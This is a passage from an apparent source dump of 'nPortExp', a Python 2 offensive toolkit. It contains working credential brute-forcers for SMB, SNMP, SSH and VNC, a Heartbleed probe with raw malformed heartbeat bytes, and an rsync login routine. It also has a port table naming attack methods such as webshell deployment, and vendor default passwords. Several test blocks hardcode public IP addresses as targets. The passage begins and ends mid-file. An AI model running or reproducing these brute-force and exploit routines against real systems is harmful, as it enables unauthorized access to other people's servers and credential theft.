EOFError 116 | if line[-2:] == CRLF: line = line[:-2] 117 | elif line[-1:] in CRLF: line = line[:-1] 118 | return line 119 | 120 | # Internal: get a response from the server, which may possibly 121 | # consist of multiple lines. Return a single string with no 122 | # trailing CRLF. If the response consists of multiple lines, 123 | # these are separated by '\n' characters in the string 124 | def getmultiline(self): 125 | line = self.getline() 126 | return line 127 | 128 | # Internal: get a response from the server. 129 | # Raise various errors if the response indicates an error 130 | def getresp(self): 131 | resp = self.getmultiline() 132 | if self.debugging: print '*resp*', resp 133 | if resp.find('ERROR') != -1: 134 | raise Error, resp 135 | else: 136 | return resp 137 | 138 | def sendcmd(self, cmd): 139 | '''Send a command and return the response.''' 140 | self.putline(cmd) 141 | return self.getresp() 142 | 143 | def login(self, module='', user = '', passwd = ''): 144 | if not user: user = 'www' 145 | if not passwd: passwd = 'www' 146 | if not module: module = 'www' 147 | 148 | self.putline(self.server_protocol_version) 149 | # self.putline('@RSYNCD: 28.0') 150 | # self.protocol_version = 28 151 | resp = self.sendcmd(module) 152 | 153 | challenge = resp[resp.find('AUTHREQD ')+9:] 154 | 155 | if self.protocol_version >= 30: 156 | md5=hashlib.md5() 157 | md5.update(passwd) 158 | md5.update(challenge) 159 | hash = base64.b64encode(md5.digest()) 160 | else: 161 | md4=hashlib.new('md4') 162 | tmp = '\0\0\0\0' + passwd + challenge 163 | md4.update(tmp) 164 | hash = base64.b64encode(md4.digest()) 165 | 166 | response, number = re.subn(r'=+$','',hash) 167 | resp = self.sendcmd(user + ' ' + response) 168 | 169 | if resp.find('OK') == -1: 170 | raise Error, resp 171 | return resp 172 | 173 | def getModules(self): 174 | '''Get modules on the server''' 175 | print self.server_protocol_version 176 | self.putline(self.server_protocol_version) 177 | 178 | resp = self.sendcmd('') 179 | print resp 180 | return resp 181 | 182 | 183 | 184 | def close(self): 185 | '''Close the connection without assuming anything about it.''' 186 | self.putline('') 187 | if self.file is not None: 188 | self.file.close() 189 | if self.sock is not None: 190 | self.sock.close() 191 | self.file = self.sock = None 192 | 193 | -------------------------------------------------------------------------------- /Exp/smb/smb.py: -------------------------------------------------------------------------------- 1 | #coding=utf-8 2 | import time 3 | import threading 4 | from printers import printPink,printGreen 5 | from impacket.smbconnection import * 6 | from multiprocessing.dummy import Pool 7 | from threading import Thread 8 | 9 | 10 | class smb_burp(object): 11 | 12 | def __init__(self,c): 13 | self.config=c 14 | self.lock=threading.Lock() 15 | self.result=[] 16 | self.lines=self.config.file2list("conf/smb.conf") 17 | 18 | def smb_connect(self,ip,username,password): 19 | crack =0 20 | try: 21 | smb = SMBConnection('*SMBSERVER', ip) 22 | smb.login(username,password) 23 | smb.logoff() 24 | crack =1 25 | except Exception, e: 26 | self.lock.acquire() 27 | print "%s smb 's %s:%s login fail " %(ip,username,password) 28 | self.lock.release() 29 | return crack 30 | 31 | def smb_l(self,ip,port): 32 | try: 33 | for data in self.lines: 34 | username=data.split(':')[0] 35 | password=data.split(':')[1] 36 | if self.smb_connect(ip,username,password)==1: 37 | self.lock.acquire() 38 | printGreen("%s smb at %s has weaken password!!-------%s:%s\r\n" %(ip,port,username,password)) 39 | self.result.append("%s smb at %s has weaken password!!-------%s:%s\r\n" %(ip,port,username,password)) 40 | self.lock.release() 41 | break 42 | except Exception,e: 43 | pass 44 | 45 | def run(self,ipdict,pinglist,threads,file): 46 | if len(ipdict['smb']): 47 | printPink("crack smb now...") 48 | print "[*] start crack smb serice %s" % time.ctime() 49 | starttime=time.time() 50 | 51 | pool=Pool(threads) 52 | 53 | for ip in ipdict['smb']: 54 | pool.apply_async(func=self.smb_l,args=(str(ip).split(':')[0],int(str(ip).split(':')[1]))) 55 | 56 | pool.close() 57 | pool.join() 58 | 59 | print "[*] stop smb serice %s" % time.ctime() 60 | print "[*] crack smb done,it has Elapsed time:%s " % (time.time()-starttime) 61 | 62 | for i in xrange(len(self.result)): 63 | self.config.write_file(contents=self.result[i],file=file) 64 | if __name__ == '__main__': 65 | import sys 66 | sys.path.append("../") 67 | from comm.config import * 68 | c=config() 69 | ipdict={'smb': ['10.211.55.3:445']} 70 | pinglist=['101.201.177.35'] 71 | test=smb_burp(c) 72 | test.run(ipdict,pinglist,50,file="../result/test") -------------------------------------------------------------------------------- /Exp/smtp/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SkewwG/nPortExp/1186b3195c6f684f85ab529d6548ba886d7d672a/Exp/smtp/__init__.py -------------------------------------------------------------------------------- /Exp/snmp/snmp.py: -------------------------------------------------------------------------------- 1 | #coding=utf-8 2 | import time 3 | import threading 4 | from printers import printPink,printGreen 5 | from multiprocessing.dummy import Pool 6 | from pysnmp.entity.rfc3413.oneliner import cmdgen 7 | 8 | 9 | class snmp_burp(object): 10 | 11 | def __init__(self,c): 12 | self.config=c 13 | self.lock=threading.Lock() 14 | self.result=[] 15 | self.lines=self.config.file2list("conf/snmp.conf") 16 | 17 | def snmp_connect(self,ip,key): 18 | crack =0 19 | try: 20 | errorIndication, errorStatus, errorIndex, varBinds =\ 21 | cmdgen.CommandGenerator().getCmd( 22 | cmdgen.CommunityData('my-agent',key, 0), 23 | cmdgen.UdpTransportTarget((ip, 161)), 24 | (1,3,6,1,2,1,1,1,0) 25 | ) 26 | if varBinds: 27 | crack=1 28 | except: 29 | pass 30 | return crack 31 | 32 | def snmp_l(self,ip,port): 33 | try: 34 | for data in self.lines: 35 | flag=self.snmp_connect(ip,key=data) 36 | if flag==1: 37 | self.lock.acquire() 38 | printGreen("%s snmp has weaken password!!-----%s\r\n" %(ip,data)) 39 | self.result.append("%s snmp has weaken password!!-----%s\r\n" %(ip,data)) 40 | self.lock.release() 41 | break 42 | else: 43 | self.lock.acquire() 44 | print "test %s snmp's scan fail" %(ip) 45 | self.lock.release() 46 | except Exception,e: 47 | pass 48 | 49 | def run(self,ipdict,pinglist,threads,file): 50 | printPink("crack snmp now...") 51 | print "[*] start crack snmp %s" % time.ctime() 52 | starttime=time.time() 53 | pool=Pool(threads) 54 | for ip in pinglist: 55 | pool.apply_async(func=self.snmp_l,args=(str(ip).split(':')[0],"")) 56 | 57 | pool.close() 58 | pool.join() 59 | 60 | print "[*] stop crack snmp %s" % time.ctime() 61 | print "[*] crack snmp done,it has Elapsed time:%s " % (time.time()-starttime) 62 | 63 | for i in xrange(len(self.result)): 64 | self.config.write_file(contents=self.result[i],file=file) 65 | 66 | -------------------------------------------------------------------------------- /Exp/ssh/ssh.py: -------------------------------------------------------------------------------- 1 | #coding=utf-8 2 | import time 3 | import threading 4 | from multiprocessing.dummy import Pool 5 | from printers import printPink,printGreen 6 | import paramiko 7 | 8 | 9 | class ssh_burp(object): 10 | 11 | def __init__(self,c): 12 | self.config=c 13 | self.lock=threading.Lock() 14 | self.result=[] 15 | self.lines=self.config.file2list("conf/ssh.conf") 16 | 17 | def ssh_connect(self,ip,username,password,port): 18 | crack=0 19 | try: 20 | client = paramiko.SSHClient() 21 | client.set_missing_host_key_policy(paramiko.AutoAddPolicy()) 22 | client.connect(ip,port,username=username, password=password) 23 | crack=1 24 | client.close() 25 | except Exception,e: 26 | if e[0]=='Authentication failed.': 27 | self.lock.acquire() 28 | print "%s ssh service 's %s:%s login fail " %(ip,username,password) 29 | self.lock.release() 30 | else: 31 | self.lock.acquire() 32 | print "connect %s ssh service at %s login fail " %(ip,port) 33 | self.lock.release() 34 | crack=2 35 | return crack 36 | 37 | def ssh_l(self,ip,port): 38 | try: 39 | for data in self.lines: 40 | username=data.split(':')[0] 41 | password=data.split(':')[1] 42 | flag=self.ssh_connect(ip,username,password,port) 43 | if flag==2: 44 | break 45 | if flag==1: 46 | self.lock.acquire() 47 | printGreen("%s ssh at %s has weaken password!!-------%s:%s\r\n" %(ip,port,username,password)) 48 | self.result.append("%s ssh at %s has weaken password!!-------%s:%s\r\n" %(ip,port,username,password)) 49 | self.lock.release() 50 | break 51 | except Exception,e: 52 | pass 53 | 54 | def run(self,ipdict,pinglist,threads,file): 55 | if len(ipdict['ssh']): 56 | printPink("crack ssh now...") 57 | print "[*] start crack ssh %s" % time.ctime() 58 | starttime=time.time() 59 | 60 | pool=Pool(threads) 61 | 62 | for ip in ipdict['ssh']: 63 | pool.apply_async(func=self.ssh_l,args=(str(ip).split(':')[0],int(str(ip).split(':')[1]))) 64 | 65 | pool.close() 66 | pool.join() 67 | 68 | print "[*] stop ssh serice %s" % time.ctime() 69 | print "[*] crack ssh done,it has Elapsed time:%s " % (time.time()-starttime) 70 | 71 | for i in xrange(len(self.result)): 72 | self.config.write_file(contents=self.result[i],file=file) 73 | 74 | 75 | 76 | if __name__ == '__main__': 77 | import sys 78 | sys.path.append("../") 79 | from comm.config import * 80 | c=config() 81 | ipdict={'ssh': ['139.129.30.58:22']} 82 | pinglist=['122.225.81.129'] 83 | test=ssh_burp(c) 84 | test.run(ipdict,pinglist,50,file="../result/test") -------------------------------------------------------------------------------- /Exp/ssl/ssltest.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | import sys 3 | import struct 4 | import socket 5 | import select 6 | import time 7 | import threading 8 | from printers import printPink,printRed 9 | from multiprocessing.dummy import Pool 10 | 11 | class ssl_burp(object): 12 | 13 | def __init__(self,c): 14 | self.config=c 15 | self.lock=threading.Lock() 16 | self.result=[] 17 | 18 | self.hello = self.h2bin(''' 19 | 16 03 02 00 dc 01 00 00 d8 03 02 53 20 | 43 5b 90 9d 9b 72 0b bc 0c bc 2b 92 a8 48 97 cf 21 | bd 39 04 cc 16 0a 85 03 90 9f 77 04 33 d4 de 00 22 | 00 66 c0 14 c0 0a c0 22 c0 21 00 39 00 38 00 88 23 | 00 87 c0 0f c0 05 00 35 00 84 c0 12 c0 08 c0 1c 24 | c0 1b 00 16 00 13 c0 0d c0 03 00 0a c0 13 c0 09 25 | c0 1f c0 1e 00 33 00 32 00 9a 00 99 00 45 00 44 26 | c0 0e c0 04 00 2f 00 96 00 41 c0 11 c0 07 c0 0c 27 | c0 02 00 05 00 04 00 15 00 12 00 09 00 14 00 11 28 | 00 08 00 06 00 03 00 ff 01 00 00 49 00 0b 00 04 29 | 03 00 01 02 00 0a 00 34 00 32 00 0e 00 0d 00 19 30 | 00 0b 00 0c 00 18 00 09 00 0a 00 16 00 17 00 08 31 | 00 06 00 07 00 14 00 15 00 04 00 05 00 12 00 13 32 | 00 01 00 02 00 03 00 0f 00 10 00 11 00 23 00 00 33 | 00 0f 00 01 01 34 | ''') 35 | 36 | self.hb = self.h2bin(''' 37 | 18 03 02 00 03 38 | 01 40 00 39 | ''') 40 | 41 | 42 | def h2bin(self,x): 43 | return x.replace(' ', '').replace('\n', '').decode('hex') 44 | 45 | 46 | def recvall(self,s, length, timeout=8): 47 | endtime = time.time() + timeout 48 | rdata = '' 49 | remain = length 50 | while remain > 0: 51 | rtime = endtime - time.time() 52 | if rtime < 0: 53 | return None 54 | r, w, e = select.select([s], [], [], 5) 55 | if s in r: 56 | data = s.recv(remain) 57 | # EOF? 58 | if not data: 59 | return None 60 | rdata += data 61 | remain -= len(data) 62 | return rdata 63 | 64 | def recvmsg(self,s): 65 | hdr = self.recvall(s, 5) 66 | if hdr is None: 67 | return None, None, None 68 | typ, ver, ln = struct.unpack('>BHH', hdr) 69 | pay = self.recvall(s, ln, 10) 70 | return typ, ver, pay 71 | 72 | 73 | def hit_hb(self,s,ip,port): 74 | s.send(self.hb) 75 | while True: 76 | typ, ver, pay = self.recvmsg(s) 77 | if typ is None: 78 | return False 79 | 80 | if typ == 24: 81 | if len(pay) > 3: 82 | self.lock.acquire() 83 | printRed('WARNING: %s ssl at %s returned more data than it should - server is vulnerable!\r\n' %(ip,port)) 84 | self.result.append('WARNING: %s ssl at %s returned more data than it should - server is vulnerable!\r\n' %(ip,port)) 85 | self.lock.release() 86 | else: 87 | self.lock.acquire() 88 | printRed('%s ssl at %s processed malformed heartbeat, but did not return any extra data.\r\n' %(ip,port)) 89 | self.result.append('%s ssl at %s processed malformed heartbeat, but did not return any extra data.\r\n' %(ip,port)) 90 | self.lock.release() 91 | return True 92 | 93 | if typ == 21: 94 | return False 95 | 96 | def openssl_test(self,ip,port): 97 | try: 98 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 99 | sys.stdout.flush() 100 | s.connect((ip, port)) 101 | sys.stdout.flush() 102 | s.send(self.hello) 103 | sys.stdout.flush() 104 | while True: 105 | typ, ver, pay = self.recvmsg(s) 106 | if typ == None: 107 | break 108 | # Look for server hello done message. 109 | if typ == 22 and ord(pay[0]) == 0x0E: 110 | break 111 | sys.stdout.flush() 112 | s.send(self.hb) 113 | self.hit_hb(s,ip,port) 114 | except Exception,e: 115 | #print e 116 | pass 117 | 118 | 119 | def run(self,ipdict,pinglist,threads,file): 120 | if len(ipdict['ssl']): 121 | printPink("crack ssl now...") 122 | print "[*] start test openssl_heart %s" % time.ctime() 123 | starttime=time.time() 124 | 125 | pool=Pool(threads) 126 | for ip in ipdict['ssl']: 127 | pool.apply_async(func=self.openssl_test,args=(str(ip).split(':')[0],int(str(ip).split(':')[1]))) 128 | pool.close() 129 | pool.join() 130 | 131 | print "[*] stop ssl serice %s" % time.ctime() 132 | print "[*] crack ssl done,it has Elapsed time:%s " % (time.time()-starttime) 133 | 134 | for i in xrange(len(self.result)): 135 | self.config.write_file(contents=self.result[i],file=file) 136 | 137 | if __name__ == '__main__': 138 | import sys 139 | sys.path.append("../") 140 | from comm.config import * 141 | c=config() 142 | ipdict={'ssl': ['222.22.224.142:443']} 143 | pinglist=['122.225.81.129'] 144 | test=ssl_burp(c) 145 | test.run(ipdict,pinglist,50,file="../result/test") 146 | -------------------------------------------------------------------------------- /Exp/vnc/vnc.py: -------------------------------------------------------------------------------- 1 | from printers import printPink,printGreen 2 | import time 3 | import threading 4 | from multiprocessing.dummy import Pool 5 | from vnclib import * 6 | 7 | 8 | class vnc_burp(object): 9 | 10 | 11 | def __init__(self,c): 12 | self.config=c 13 | self.lock=threading.Lock() 14 | self.result=[] 15 | self.lines=self.config.file2list("conf/vnc.conf") 16 | 17 | def vnc_connect(self,ip,port,password): 18 | crack =0 19 | try: 20 | v = VNC() 21 | v.connect(ip, port, 10) 22 | code,mesg=v.login(password) 23 | if mesg=='OK': 24 | crack=1 25 | except Exception,e: 26 | crack=2 27 | pass 28 | return crack 29 | 30 | def vnc_l(self,ip,port): 31 | try: 32 | for data in self.lines: 33 | flag=self.vnc_connect(ip=ip,port=port,password=data) 34 | if flag==2: 35 | self.lock.acquire() 36 | print "%s vnc at %s not allow connect now because of too many security failure" %(ip,port) 37 | self.lock.release() 38 | break 39 | 40 | if flag==1: 41 | self.lock.acquire() 42 | printGreen("%s vnc at %s has weaken password!!-----%s\r\n" %(ip,port,data)) 43 | self.result.append("%s vnc at %s has weaken password!!-----%s\r\n" %(ip,port,data)) 44 | self.lock.release() 45 | break 46 | else: 47 | self.lock.acquire() 48 | print "login %s vnc service with %s fail " %(ip,data) 49 | self.lock.release() 50 | except Exception,e: 51 | pass 52 | 53 | def run(self,ipdict,pinglist,threads,file): 54 | if len(ipdict['vnc']): 55 | printPink("crack vnc now...") 56 | print "[*] start crack vnc %s" % time.ctime() 57 | starttime=time.time() 58 | 59 | pool=Pool(threads) 60 | 61 | for ip in ipdict['vnc']: 62 | pool.apply_async(func=self.vnc_l,args=(str(ip).split(':')[0],int(str(ip).split(':')[1]))) 63 | 64 | pool.close() 65 | pool.join() 66 | 67 | print "[*] stop vnc serice %s" % time.ctime() 68 | print "[*] crack vnc done,it has Elapsed time:%s " % (time.time()-starttime) 69 | 70 | for i in xrange(len(self.result)): 71 | self.config.write_file(contents=self.result[i],file=file) 72 | 73 | 74 | 75 | -------------------------------------------------------------------------------- /Exp/vnc/vnclib.py: -------------------------------------------------------------------------------- 1 | __author__ = 'wilson' 2 | from Crypto.Cipher import DES 3 | from sys import version_info 4 | import time 5 | 6 | class VNC_Error(Exception): 7 | pass 8 | class VNC: 9 | def connect(self, host, port, timeout): 10 | self.fp = socket.create_connection((host, port), timeout=timeout) 11 | resp = self.fp.recv(99) # banner 12 | 13 | self.version = resp[:11].decode('ascii') 14 | 15 | if len(resp) > 12: 16 | raise VNC_Error('%s %s' % (self.version, resp[12:].decode('ascii', 'ignore'))) 17 | 18 | return self.version 19 | 20 | def login(self, password): 21 | major, minor = self.version[6], self.version[10] 22 | 23 | if (major, minor) in [('3', '8'), ('4', '1')]: 24 | proto = b'RFB 003.008\n' 25 | 26 | elif (major, minor) == ('3', '7'): 27 | proto = b'RFB 003.007\n' 28 | 29 | else: 30 | proto = b'RFB 003.003\n' 31 | 32 | self.fp.sendall(proto) 33 | 34 | time.sleep(0.5) 35 | 36 | resp = self.fp.recv(99) 37 | 38 | 39 | if minor in ('7', '8'): 40 | code = ord(resp[0:1]) 41 | if code == 0: 42 | raise VNC_Error('Session setup failed: %s' % resp.decode('ascii', 'ignore')) 43 | 44 | self.fp.sendall(b'\x02') # always use classic VNC authentication 45 | resp = self.fp.recv(99) 46 | 47 | else: # minor == '3': 48 | code = ord(resp[3:4]) 49 | if code != 2: 50 | raise VNC_Error('Session setup failed: %s' % resp.decode('ascii', 'ignore')) 51 | 52 | resp = resp[-16:] 53 | 54 | if len(resp) != 16: 55 | raise VNC_Error('Unexpected challenge size (No authentication required? Unsupported authentication type?)') 56 | 57 | 58 | pw = password.ljust(8, '\x00')[:8] # make sure it is 8 chars long, zero padded 59 | 60 | key = self.gen_key(pw) 61 | 62 | 63 | des = DES.new(key, DES.MODE_ECB) 64 | enc = des.encrypt(resp) 65 | 66 | 67 | self.fp.sendall(enc) 68 | 69 | resp = self.fp.recv(99) 70 | 71 | self.fp.close() 72 | code = ord(resp[3:4]) 73 | mesg = resp[8:].decode('ascii', 'ignore') 74 | 75 | if code == 1: 76 | return code, mesg or 'Authentication failure' 77 | 78 | elif code == 0: 79 | return code, mesg or 'OK' 80 | 81 | else: 82 | raise VNC_Error('Unknown response: %s (code: %s)' % (repr(resp), code)) 83 | 84 | def gen_key(self, key): 85 | newkey = [] 86 | for ki in range(len(key)): 87 | bsrc = ord(key[ki]) 88 | btgt = 0 89 | for i in range(8): 90 | if bsrc & (1 << i): 91 | btgt = btgt | (1 << 7-i) 92 | newkey.append(btgt) 93 | 94 | if version_info[0] == 2: 95 | return ''.join(chr(c) for c in newkey) 96 | else: 97 | return bytes(newkey) 98 | -------------------------------------------------------------------------------- /Libs/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SkewwG/nPortExp/1186b3195c6f684f85ab529d6548ba886d7d672a/Libs/__init__.py -------------------------------------------------------------------------------- /Libs/__pycache__/__init__.cpython-34.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SkewwG/nPortExp/1186b3195c6f684f85ab529d6548ba886d7d672a/Libs/__pycache__/__init__.cpython-34.pyc -------------------------------------------------------------------------------- /Libs/__pycache__/glo.cpython-34.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SkewwG/nPortExp/1186b3195c6f684f85ab529d6548ba886d7d672a/Libs/__pycache__/glo.cpython-34.pyc -------------------------------------------------------------------------------- /Libs/__pycache__/methods.cpython-34.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SkewwG/nPortExp/1186b3195c6f684f85ab529d6548ba886d7d672a/Libs/__pycache__/methods.cpython-34.pyc -------------------------------------------------------------------------------- /Libs/__pycache__/nmapPortScan.cpython-34.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SkewwG/nPortExp/1186b3195c6f684f85ab529d6548ba886d7d672a/Libs/__pycache__/nmapPortScan.cpython-34.pyc -------------------------------------------------------------------------------- /Libs/__pycache__/plugins.cpython-34.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SkewwG/nPortExp/1186b3195c6f684f85ab529d6548ba886d7d672a/Libs/__pycache__/plugins.cpython-34.pyc -------------------------------------------------------------------------------- /Libs/glo.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | ''' 3 | 使用的时候,主脚本 from glo import *导入该模块,然后初始化init() 4 | 其他脚本只需要 from glo import *导入模块,然后使用get_value即可。 5 | ''' 6 | import os 7 | def init(): 8 | global _global_dict 9 | _global_dict = {} 10 | _global_dict['pyVersion'] = _pyVersion() # python版本 11 | _global_dict['logger'] = _logger() # 日志 12 | _global_dict['pwdTxtsName'] = pwdTxtsName() # 获取密码字典名字 13 | _global_dict['ports_protocols'] = _ports_protocols() #端口协议 14 | _global_dict['serviceAdmin'] = serviceAdmin() # 各个服务对应的管理员用户名,比如mysql的root,mssql的sa 15 | _global_dict['probes'] = _probes() # 探针 16 | _global_dict['serviceRE'] = _service() # 服务名和正则规则 17 | _global_dict['getcwd'] = os.getcwd() 18 | _global_dict['pwdTxts'] = os.listdir('./password') # 获取password目录下的所有密码文件名字 19 | 20 | _global_dict['pingList'] = [] # 存放存活IP 21 | _global_dict['ipOpenPort'] = {} # 存放开放端口 22 | _global_dict['serviceList'] = {} # 存放探测到的服务 23 | _global_dict['brustPortDic'] = {} # 存放要爆破的IP,端口,字典 eg: {'116.89.248.27': {'3306': 'dic_password_mysql.txt'}, '116.89.248.28': {'3306': 'dic_password_mysql.txt'} 24 | setPwdSys() # 添加密码文件目录到环境变量 25 | 26 | 27 | 28 | # 设置全局变量 _global_dict的值 29 | def set_value(key, value): 30 | _global_dict[key] = value 31 | 32 | # 获取_global_dict值 33 | def get_value(key, value=None): 34 | """ 获得一个全局变量,不存在则返回默认值 """ 35 | try: 36 | return _global_dict[key] 37 | except KeyError as e: 38 | return value 39 | 40 | def exist_key(key): 41 | if key in _global_dict.keys(): 42 | return True 43 | else: 44 | return False 45 | 46 | # 添加pingList 47 | def addPingValue(ip): 48 | _global_dict['pingList'].append(ip) 49 | 50 | # 添加IP的开放端口 51 | def addIpOpenPort(ip, port): 52 | if ip not in _global_dict['ipOpenPort'].keys(): 53 | _global_dict['ipOpenPort'][ip] = [port] 54 | else: 55 | _global_dict['ipOpenPort'][ip].append(port) 56 | 57 | # 添加探测到的服务 最终格式为:{'123.125.115.109': {'80': ['http']}, '123.125.115.111': {'80': ['http']}} 58 | def addIpPortService(ip, port, service): 59 | if ip not in _global_dict['serviceList'].keys(): # ip不在字典里 60 | _global_dict['serviceList'][ip] = {} 61 | _global_dict['serviceList'][ip][port] = service 62 | elif port not in _global_dict['serviceList'][ip].keys(): # ip在字典里,ip的值里没有端口 63 | _global_dict['serviceList'][ip][port] = service 64 | elif service[0] not in _global_dict['serviceList'][ip][port]: # ip在字典里,ip的值里有端口 65 | _global_dict['serviceList'][ip][port].extend(service) 66 | 67 | # 版本号 68 | def _pyVersion(): 69 | import sys 70 | return 2 if sys.version[0] < '3' else 3 71 | 72 | # 定义logger日志 73 | def _logger(): 74 | import logging 75 | # 第一步,创建一个logger 76 | logger = logging.getLogger() 77 | logger.setLevel(logging.DEBUG) # Log等级总开关 78 | 79 | # 第二步,创建一个handler,用于写入日志文件 80 | logfile = 'logger.txt' 81 | fh = logging.FileHandler(logfile, mode='w') 82 | fh.setLevel(logging.DEBUG) # 输出到file的log等级的开关 83 | 84 | # 第三步,再创建一个handler,用于输出到控制台 85 | ch = logging.StreamHandler() 86 | ch.setLevel(logging.DEBUG) # 输出到console的log等级的开关 87 | 88 | # 第四步,定义handler的输出格式 89 | formatter = logging.Formatter("%(asctime)s - %(filename)s[line:%(lineno)d] - %(levelname)s: %(message)s") 90 | fh.setFormatter(formatter) 91 | ch.setFormatter(formatter) 92 | 93 | # 第五步,将logger添加到handler里面 94 | logger.addHandler(fh) 95 | logger.addHandler(ch) 96 | #print('!!!!!!!!logger') 97 | # print(logger) 98 | return logger 99 | 100 | # 获取线程事件 101 | def getThrEvent(): 102 | import threading 103 | event = threading.Event() 104 | event.set() 105 | return event 106 | 107 | 108 | # 获取字典txt名字 109 | def pwdTxtsName(): 110 | import os 111 | pwdTxtsName = os.listdir('./password/') 112 | return pwdTxtsName 113 | 114 | 115 | # 端口协议 116 | def _ports_protocols(): 117 | ports_protocols = { 118 | "20": {"name": "ftp_data", "detail": "数据端口", "exp": "爆破、嗅探、溢出、后门"}, 119 | "21": {"name": "ftp_control", "detail": "控制端口", "exp": "爆破、嗅探、溢出、后门"}, 120 | '23': {"name": 'telnet', "detail": '远程连接', 'exp': '爆破、嗅探'}, 121 | '25': {'name': 'smtp', 'detail': '邮件服务', 'exp': '邮件伪造'}, 122 | '53': {'name': 'DNS', 'detail': '域名系统', 'exp': 'DNS区域传输、DNS劫持、DNS缓存投毒、DNS欺骗、深度利用:利用DNS隧道技术刺透防火墙'}, 123 | '67': {'name': 'dhcp', 'detail': '', 'exp': '劫持、欺骗'}, 124 | '68': {'name': 'dhcp', 'detail': '', 'exp': '劫持、欺骗'}, 125 | '110': {'name': 'pop3', 'detail': '', 'exp': '爆破'}, 126 | '139': {'name': 'samba', 'detail': '', 'exp': '爆破、未授权访问、远程代码执行'}, 127 | '143': {'name': 'imap', 'detail': '', 'exp': '爆破'}, 128 | '161': {'name': 'snmp', 'detail': '', 'exp': '爆破'}, 129 | '389': {'name': 'ldap', 'detail': '', 'exp': '注入攻击、未授权访问'}, 130 | '512': {'name': 'linux r', 'detail': '', 'exp': '直接使用rlogin'}, 131 | '513': {'name': 'linux r', 'detail': '', 'exp': '直接使用rlogin'}, 132 | '514': {'name': 'linux r', 'detail': '', 'exp': '直接使用rlogin'}, 133 | '873': {'name': 'rsync', 'detail': '', 'exp': '未授权访问'}, 134 | '888': {'name': 'BTLINUX', 'detail': '', 'exp': '宝塔Linux主机管理后台/默认帐户:admin|默认密码:admin'}, 135 | '999': {'name': 'PMA', 'detail': '', 'exp': '护卫神佩带的phpmyadmin管理后台,默认帐户:root|默认密码:huweishen.com'}, 136 | '1080': {'name': 'socket', 'detail': '', 'exp': '爆破:进行内网渗透'}, 137 | '1352': {'name': 'lotus', 'detail': '', 'exp': '爆破:弱口令、信息泄露:源代码'}, 138 | '1433': {'name': 'mssql', 'detail': '', 'exp': '爆破:使用系统用户登录、注入攻击'}, 139 | '1521': {'name': 'oracle', 'detail': 'iSqlPlus Port:5560,7778', 'exp': '爆破:TNS、注入攻击'}, 140 | '2049': {'name': 'nfs', 'detail': '', 'exp': '配置不当'}, 141 | '2181': {'name': 'zookeeper', 'detail': '', 'exp': '未授权访问'}, 142 | '3306': {'name': 'mysql', 'detail': '', 'exp': '爆破、拒绝服务、注入'}, 143 | '3389': {'name': 'rdp', 'detail': '', 'exp': '爆破、Shift后门'}, 144 | '4848': {'name': 'glassfish', 'detail': 'web中间件,admin/adminadmin', 'exp': '爆破:控制台弱口令、认证绕过'}, 145 | '5000': {'name': 'sybase/DB2', 'detail': '', 'exp': '爆破、注入'}, 146 | '5432': {'name': 'postgresql', 'detail': '', 'exp': '缓冲区溢出、注入攻击、爆破:弱口令'}, 147 | '5632': {'name': 'pcanywhere', 'detail': '', 'exp': '拒绝服务、代码执行'}, 148 | '5900': {'name': 'vnc', 'detail': '', 'exp': '爆破:弱口令、认证绕过'}, 149 | '5901': {'name': 'vnc', 'detail': '', 'exp': '爆破:弱口令、认证绕过'}, 150 | '5902': {'name': 'vnc', 'detail': '', 'exp': '爆破:弱口令、认证绕过'}, 151 | '6379': {'name': 'redis', 'detail': '', 'exp': '未授权访问、爆破:弱口令'}, 152 | '7001': {'name': 'weblogic', 'detail': '', 'exp': 'JAVA反序列化、控制台弱口令、控制台部署webshell'}, 153 | '7002': {'name': 'weblogic', 'detail': '', 'exp': 'JAVA反序列化、控制台弱口令、控制台部署webshell'}, 154 | '80': {'name': 'web', 'detail': '', 'exp': '常见Web攻击、控制台爆破、对应服务器版本漏洞'}, 155 | '443': {'name': 'web', 'detail': '', 'exp': '常见Web攻击、控制台爆破、对应服务器版本漏洞'}, 156 | '8080': {'name': 'web|Tomcat|..', 'detail': '', 'exp': '常见Web攻击、控制台爆破、对应服务器版本漏洞、Tomcat漏洞'}, 157 | '8069': {'name': 'zabbix', 'detail': '', 'exp': '远程命令执行'}, 158 | '9090': {'name': 'websphere', 'detail': '', 'exp': '文件泄露、爆破:控制台弱口令、Java反序列'}, 159 | '9200': {'name': 'elasticsearch', 'detail': '', 'exp': '未授权访问、远程代码执行'}, 160 | '9300': {'name': 'elasticsearch', 'detail': '', 'exp': '未授权访问、远程代码执行'}, 161 | '11211': {'name': 'memcacache', 'detail': '', 'exp': '未授权访问'}, 162 | '27017': {'name': 'mongodb', 'detail': '', 'exp': '爆破、未授权访问'}, 163 | '27018': {'name': 'mongodb', 'detail': '', 'exp': '爆破、未授权访问'}, 164 | '50070': {'name': 'Hadoop', 'detail': 'NameNode', 'exp': '爆破、未授权访问'}, 165 | '50075': {'name': 'Hadoop', 'detail': 'DataNode', 'exp': '爆破、未授权访问'}, 166 | '14000': {'name': 'Hadoop', 'detail': 'httpfs', 'exp': '爆破、未授权访问'}, 167 | '8480': {'name': 'Hadoop', 'detail': 'journalnode', 'exp': '爆破、未授权访问'}, 168 | '8088': {'name': 'web', 'detail': '后台', 'exp': '爆破、未授权访问'}, 169 | '50030': {'name': 'Hadoop', 'detail': 'JobTracker', 'exp': '爆破、未授权访问'}, 170 | '50060': {'name': 'Hadoop', 'detail': 'TaskTracker', 'exp': '爆破、未授权访问'}, 171 | '60010': {'name': 'Hadoop', 'detail': 'master', 'exp': '爆破、未授权访问'}, 172 | '60030': {'name': 'Hadoop', 'detail': 'regionserver', 'exp': '爆破、未授权访问'}, 173 | '10000': {'name': 'Virtualmin/Webmin', 'detail': 'hive-server2', 'exp': '服务器虚拟主机管理系统'}, 174 | '10003': {'name': 'Hadoop', 'detail': 'spark-jdbcserver', 'exp': '爆破、未授权访问'}, 175 | '5984': {'name': 'couchdb', 'detail': 